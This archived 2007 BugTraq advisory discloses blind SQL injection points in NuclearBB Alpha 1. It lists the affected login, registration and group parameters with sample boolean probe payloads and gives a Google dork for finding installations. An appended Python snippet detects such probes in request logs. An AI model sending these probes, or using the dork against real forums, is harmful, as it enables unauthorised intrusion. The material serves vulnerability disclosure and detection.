BugTraq
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
Apr 18 2007 07:16PM
john (at) martinelli (dot) com
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"
=============
String Inputs
=============
----------------------------
login.php - $_POST['submit']
----------------------------
username=xyz
password=passxyz
submit=Login"+and+"1"="0
--------------------------------
register.php - $_POST['website']
--------------------------------
username=xyz@xyz.com
email=xyz@xyz.com
pass1=passwordxyz
pass2=passwordxyz
website=xyz@xyz.com"+and+"1"="0
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com
icq=xyz@xyz.com
signature=xyz@xyz.com
coppa_state=over
register_submit=Register
----------------------------
register.php - $_POST['aol']
----------------------------
username=xyz@xyz.com
email=xyz@xyz.com
pass1=xyz@xyz.com
pass2=xyz@xyz.com
website=xyz@xyz.com
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com"+and+"1"="0
icq=xyz@xyz.com
signature=xyz@xyz.com
coppa_state=over
register_submit=Register
----------------------------------
register.php - $_POST['signature']
----------------------------------
username=xyz@xyz.com
email=xyz@xyz.com
pass1=xyz@xyz.com
pass2=xyz@xyz.com
website=xyz@xyz.com
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com
icq=xyz@xyz.com
signature=xyz@xyz.com"+and+"1"="0
coppa_state=over
register_submit=Register
==============
Numeric Inputs
==============
-----------------------
groups.php - $_GET['g']
-----------------------
http://www.example.com/groups.php?g=1+and+1=0
------------------------------
register.php - $_POST['email']
------------------------------
username=xyz@xyz.com
email=xyz@xyz.com+and+1=0
pass1=xyz@xyz.com
pass2=xyz@xyz.com
website=xyz@xyz.com
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com
icq=xyz@xyz.com
signature=xyz@xyz.com
coppa_state=over&register_submit=Register
John Martinelli
john (at) martinelli (dot) com
http://john-martinelli.com
April 18th, 2007
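
The advisory separates string-context probes (a quote closes the value before the boolean test) from numeric-context ones (no quote). As an added example that is not part of the original post, the sketch below flags both forms in decoded request parameters for log triage; the function names are hypothetical and the sample requests are constructed from the parameter names listed above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# A literal is a number or a quoted token; the closing quote is optional because
# in a string-context probe the application's own closing quote completes it.
_LITERAL = r"""(?:\d+|["']\w*["']?)"""

# Value ends with: [quote] AND/OR literal = literal
BOOLEAN_PROBE = re.compile(
    rf"""["']?\s+(?:and|or)\s+{_LITERAL}\s*=\s*{_LITERAL}\s*$""",
    re.IGNORECASE,
)


def classify(value):
    """Return 'string', 'numeric' or None for one decoded parameter value."""
    m = BOOLEAN_PROBE.search(value)
    if not m:
        return None
    # A quote anywhere in the matched tail means the probe targets a quoted field.
    return "string" if re.search(r"""["']""", m.group(0)) else "numeric"


def scan(query_or_body):
    """Return [(param, context)] for parameters that end in a boolean probe."""
    hits = []
    # parse_qsl decodes '+' and %XX, so the check runs on what the application sees.
    for name, value in parse_qsl(query_or_body, keep_blank_values=True):
        context = classify(value)
        if context:
            hits.append((name, context))
    return hits


# Constructed sample requests (query string or form body), not captured traffic.
SAMPLES = [
    'username=xyz&password=passxyz&submit=Login"+and+"1"="0',
    urlsplit("http://www.example.com/groups.php?g=1+and+1=0").query,
    "username=xyz&email=xyz@xyz.com+and+1=0&coppa_state=over&register_submit=Register",
    "username=xyz&signature=rock+and+roll&website=http://example.com/?a=1",  # benign
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan(sample), "<-", sample)
```

A match is a triage signal rather than proof of injection; the fix on the application side is to bind every one of these parameters as a query parameter and to validate numeric inputs such as `g` as integers.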
Copyright 2009, SecurityFocus